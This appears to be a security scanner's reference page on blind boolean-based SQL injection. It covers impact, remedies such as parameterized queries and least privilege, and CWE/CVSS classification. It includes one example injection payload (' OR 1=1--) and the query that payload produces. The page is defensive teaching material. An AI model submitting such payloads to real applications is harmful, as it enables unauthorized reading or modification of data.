SQL Injection: Blind Boolean Based
Severity: High
Test name: SQL Injection (SQLI)
Test ID: sqli
Test name: SQL Injection (SQLI)
Test ID: sqli
Summary |
---|
A SQL injection attack is the insertion (injection) of a malicious SQL query via the input data from a client to an application. As a result, an attacker can execute any SQL query on the client's database with the access rights that are granted to the application. It means that the attacker can read, update, or delete sensitive data, or even administrate operations on the server side.
Blind Boolean Based is a specific type of the SQL Injection, which relies on the TRUE or FALSE question to the database and determines the answer based on the response.
Impact |
---|
This vulnerability allows an attacker to:
- Modify application data
- Bypass protection mechanism
- Read application data
Example |
---|
- The unprotected application executes the following query containing the user input
Laptops
, which returns onlyactive
products for selectedcategory
:
SELECT name, price FROM products WHERE category = 'Laptops' AND status = 'active'
- Instead of the
Laptops
, an attacker can submit the input like:' OR 1=1--
. As a result, the application will return allproducts
with anystatus
. The following SQL will be executed:
SELECT name, price FROM products WHERE category = '' OR 1=1--
Location |
---|
The issue can be found in the source code on the server side.
Remedy suggestions |
---|
- Use the prepared statements with variable binding (aka parameterized queries). Parameterized queries force the developer to first define all the SQL code, and then pass each parameter (given below) to the query later. This coding style allows the database to distinguish between code and data, regardless of the input type a user supplies.
- Java EE – use
PreparedStatement()
with bind variables - .NET – use parameterized queries like
SqlCommand()
orOleDbCommand()
with bind variables - PHP – use PDO with strongly typed parameterized queries (using
bindParam()
) - Hibernate - use
createQuery()
with bind variables (called named parameters in Hibernate) - SQLite - use
sqlite3_prepare()
to create a statement object
- Java EE – use
- Avoid generation of dynamic SQL inside stored procedures. If it can't be avoided, the stored procedure must use input validation or proper escaping to make sure that all user supplied input to the stored procedure can't be used to inject SQL code into the dynamically generated query.
- Use the least privilege approach to provide defense in depth and minimize the potential damage of a successful SQL injection attack. Minimize the privileges assigned to every database account in your environment (do not assign DBA or admin type access rights to your application accounts).
Classifications |
---|
- CWE-89
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
References |
---|
Updated 5 months ago